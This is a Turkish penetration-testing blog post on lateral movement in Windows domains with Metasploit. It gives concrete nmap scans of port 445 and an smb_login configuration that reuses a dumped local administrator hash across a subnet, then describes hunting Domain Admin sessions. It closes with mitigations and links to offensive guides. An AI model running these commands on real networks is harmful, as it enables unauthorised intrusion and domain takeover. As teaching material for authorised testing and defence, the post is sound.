İpucu: smb_enumusers_domain Modülü ile Domain Admin Olma Senaryosu

smb_enumusers_domain Modülü ile Domain Admin Olma Senaryosu

Etki alanı sızma testlerinde en çok kullanılan yöntemlerden biri, aynı gömülü yerel yönetici (Built-in Administrator) parolasını kullanan bilgisayarların tespit edilmesidir. Bu amaçla öncelikle port taraması gerçekleştirilir ve tarama sonucunda 445. portu açık olan bilgisayarlarda smb_login modülü (http://www.offensive-security.com/metasploit-unleashed/SMB_Login_Check) çalıştırılır. Bu modül temel olarak hedef IP adreslerine, kimlik doğrulaması yapılacak kullanıcıya (genelde gömülü yerel yönetici kullanılır) ait etki alanı adına (genelde WORKGROUP kullanılır), kullanıcı adına (genelde Administrator kullanılır) ve parola (genelde parola direk elde edilemediği için parola özeti kullanılır) bilgilerine ihtiyaç duyar. Bu (smb_login) modül ile hedef bilgisayarlara verilen kullanıcı bilgileri ile giriş yapılabilecek bilgisayarların listesi elde edilir. Örnek bir sonuç aşağıdaki gibidir:

Bu modül ile tespit edilen bilgisayarlar için psexec modülü (http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash) çalıştırılarak hedef bilgisayarlara yetkili kullanıcı (SYSTEM) hakları ile giriş yapılmaya çalışılır. Giriş yapılan her bilgisaayrda hem kritik veri aranır hem de Domain Admin kullanıcısına ait jeton (token) araştırması yapılır.
Yukarıda temel olarak belirtilen bu işlemler sırasında Domain Admin jetonuna ulaşmak zahmetli olabilmektedir. Bu amaçla smb_enumusers_domain (http://www.rapid7.com/db/modules/auxiliary/scanner/smb/smb_enumusers_domain) adlı bir modül kullanılır. Bu modül ile bilgisayara giriş yapan kullanıcılar tespit edilebilir. Modülün örnek bir çıktısı aşağıdaki gibidir:

Bu (smb_enumusers_domain) modül, smb_login modülü ile yaklaşık olarak aynı parametreleri (hedef IP adresleri, kullanıcı adı, parola veya parola özeti, etki alanı adı başta olmak üzere diğer parametreler de özelleştirilebilir) alarak ilgili bilgisayarlarda oturumu olan hesapları listeler. Bu modülün çıktısından Domain Admin kullanıcıları seçilirse, hedef olarak bu bilgisayarlar üzerine yoğunlaşılabilir.

Bu modülün çıktısını ve etki alanındaki tüm yöneticilerin hesaplarının bulunduğu dosyayı parametre olarak alan bir betiğin sonucu aşağıdaki gibidir.

Bu modülün yaptığı işi ve daha kapsamlı seçenekler sunan KACAK adı uygulama ile ilgili ayrıntılı bilgi için bakınız.

İpucu: smb_login Modülü ile Yayılabilecek Makinelerin Belirlenmesi

smb_login Modülü ile Yayılabilecek Makinelerin Belirlenmesi

Amaç

• Port taraması ile SMB (Server Message Block protokolü) dosya paylaşımını sağlayan TCP 445. portu açık olan makineler bulunacaktır.
• Elde edilen bir yerel kullanıcı hesap bilgilerinin, organizasyondaki diğer makinelerde de yetkili olup olmadığı belirlenecektir.

Yöntem
Önceki adım ile elimizde sadece bir makinede yerel yönetici hesabı dahil olmak üzere yerel kullanıcı hesaplarına ait şifrenin özeti bulunmaktadır:

Hedef makinedeki kullanıcıların şifre özetlerinin listelenmesi

Bu özet halindeki şifreyi ve Administrator (yerel yönetici) kullanıcısı kullanarak, diğer makinelere de girilmeye ve böylece organizasyondaki diğer makinelere yayılım gerçekleşecektir. Yayılım işlemi; port taraması yapıldıktan sonra veya direk olarak zafiyetle ilgili modül kullanılarak gerçekleştirilebilir.
SMB dosya paylaşım portu (TCP/445) açık olan makinelerin bulunması nmap komutu ile (veya Zenmap kullanarak) gerçekleştirilebilir:

nmap –Pn –sT –p 445 192.168.172.0/24 --open

nmap komutu ile 445. portu açık olan makinelerin tespit edilmesi

Büyük bir ağda çok uzun bir sonuç gelebileceğinden sadece IP’lerin alınmasını isteyebiliriz. Bunun için düzenli ifadeler (regex) kullanılabilir:

nmap –Pn –sT –p 445 192.168.172.0/24 --open | grep -oE '.*((25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])\.){3}(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])'

veya

nmap –Pn –sT –p 445 192.168.172.0/24 --open | grep –oE '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}'

veya

nmap –Pn –sT –p 445 192.168.172.0/24 --open | grep –oE ‘[0-9]{1,3}[\.]'

nmap komutu ile 445. portu açık olan makinelerin listelenmesi

SMB dosya paylaşımı açık olan IP'ler bulunduktan sonra sadece bu makinelere sızılmaya çalışılabildiği gibi, tüm ağdaki makineler için de sızma işlemi denemesi yapılabilir.
Sızma işlemini deneyeceğimiz makinelerde, hashdump ile şifresinin özetini elde ettiğimiz yerel yönetici hesabı ile aynı şifreyi kullanan kullanıcılar araştırılır:

search smb_login
use auxiliary/scanner/smb/smb_login
show options

smb_login modülünün incelenmesi

Seçenekler uygun şekilde ayarlanır:

set BLANK_PASSWORDS false
set RHOST 192.168.172.0/24
set SMBPASS aad3b435b51404eeaad3b435b51404ee:da8aef7a322d9ecf8d1d7e220f837176
set SMBUSER administrator
set THREADS 15
set USER_AS_PASS false

smb_login modülünün düzenlenmesi

Exploit işlemi gerçekleştirilir:

exploit

SUCCESSFUL LOGIN sonucunu dönenler "administrator" kullanıcısına ait şifrenin özeti, elimizdeki özet değer ile aynı olan makinelerdir:

smb_login kontrolünde başarılı dönen sonuç örneği

Not: FAILED LOGIN sonucunu dönenler ise başarısız exploit denemeleridir:

smb_login kontrolünde başarısız dönen sonuç örneği

Not: smb_login modülü yerine hedef odaklı olarak smb_enumusers_domain modülü de kullanılabilir. Bu modülle ilgili ayrıntılı bilgi için bakınız:

http://ertugrulbasaranoglu.blogspot.com.tr/2013/11/ipucu-smbenumusersdomain-modulu-ile.html

Önlem

• Ağ üzerinde kurallar tanımlayarak; belirlenen IP’lere, belirlenen portlardan kontrollü bir şekilde izin verilmelidir.
• “administrator” gibi varsayılan yerel yönetici hesaplarının isminin değiştirilmelidir. Böylece yapılacak birçok saldırıda yerel yönetici hesabının isminin kolayca ve otomatik olarak bulunmasını zorlaştıracaktır.
• Organizasyondaki makinelerde bulunan yerel kullanıcıların şifreleri farklı ayarlanmalıdır.
• Yerel yönetici hesaplarının şifreleri,  şifre kırma saldırılarına karşı korumak amacıyla karmaşık seçilmelidir.
• Kullanılmayan ve ihtiyaç duyulmayan yerel yönetici hesapları kaldırılmalı veya devre dışı bırakılmalıdır.

Pentest Senaryoları

Senaryolar

Deneme Ortamı: Free Metasploit Penetration Testing Lab In The Cloud
Kaynak site:
https://community.rapid7.com/community/metasploit/blog/2013/01/08/free-metasploit-penetration-testing-lab-in-the-cloud

Create Exploit Using Msfvenom to Hack Windows 7 SP1
Kaynak site:
http://vishnuvalentino.com/hacking-tutorial/create-exploit-using-msfvenom-to-hack-windows-7-sp1/

5 Ways to Find Systems Running Domain Admin Processes
Kaynak site:
http://www.netspi.com/blog/2012/07/09/5-ways-to-find-systems-running-domain-admin-processes/

Dumping Clear Text Passwords
Kaynak site:
http://e-spohn.com/blog/2012/07/06/dumping-clear-text-passwords/

Yapışkan Tuşlar ile Komut Satırına Geçme
Kaynak site:
http://ertugrulbasaranoglu.blogspot.com/2012/10/ipucu-kapal-oturumda-yapskan-tuslar-ile.html

Bypass Windows Logons with the Utilman.exe Trick
Kaynak site:
http://www.technibble.com/bypass-windows-logons-utilman/
http://www.youtube.com/watch?feature=endscreen&v=di3BIqq40bE&NR=1

Winlockpwn: More then a Partytrick
Kaynak site:
http://www.spylogic.net/2008/05/winlockpwn-more-then-a-partytrick/
http://www.youtube.com/watch?v=jbOioD8LU5Y

Inception
Kaynak site:
http://www.breaknenter.org/projects/inception/

BeeF + Social-Engineering + Metasploit
Kaynak site:
https://www.youtube.com/watch?feature=player_embedded&v=EPJWsElU0fs

Owning Windows Networks with Responder 1.7
Kaynak site:
http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html

Finding Admin Access
Kaynak site:
http://www.room362.com/blog/2012/10/30/finding-admin-access.html

Hack netNTLM Credential using Microsoft Word UNC Path Injector
Kaynak site:
http://www.hackingarticles.in/hack-netntlm-credential-using-microsoft-word-unc-path-injector/

Metasploit ile Oracle Veritabanlarına Yönelik Temel Sızma Testleri
Kaynak site:
http://www.agguvenligi.net/2013/07/metasploit-ile-oracle-pentest.html